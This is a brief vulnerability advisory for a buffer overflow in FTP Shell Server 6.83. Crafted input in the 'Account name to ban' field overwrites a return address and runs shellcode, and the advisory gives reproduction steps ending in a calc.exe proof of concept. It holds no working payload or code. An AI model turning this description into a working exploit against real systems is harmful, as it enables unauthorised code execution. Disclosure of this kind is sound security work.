FTP Shell Server Buffer Overflow Vulnerability Allowing Arbitrary Code Execution

A buffer overflow vulnerability has been identified in FTP Shell Server version 6.83. The issue resides in the 'Account name to ban' field, where local attackers can execute arbitrary code by injecting a crafted string. This exploitation involves overwriting the return address to execute commands such as calc.exe. The vulnerability arises from improper handling of input in the Manage FTP Accounts dialog, allowing shellcode injection through the account name parameter.

Impact

Exploitation of this vulnerability allows for arbitrary code execution on the affected system.

Reproduction

To reproduce this vulnerability, open the FTP Shell Server application and navigate to the 'Manage FTP Accounts' dialog. When adding a new account, paste a crafted payload into the 'Account name to ban' field. The payload should be designed to exploit the buffer overflow by overwriting the return address with a location that executes the injected shellcode. Once the payload is submitted, the calculator application (calc.exe) will be launched as a proof of concept, indicating successful exploitation.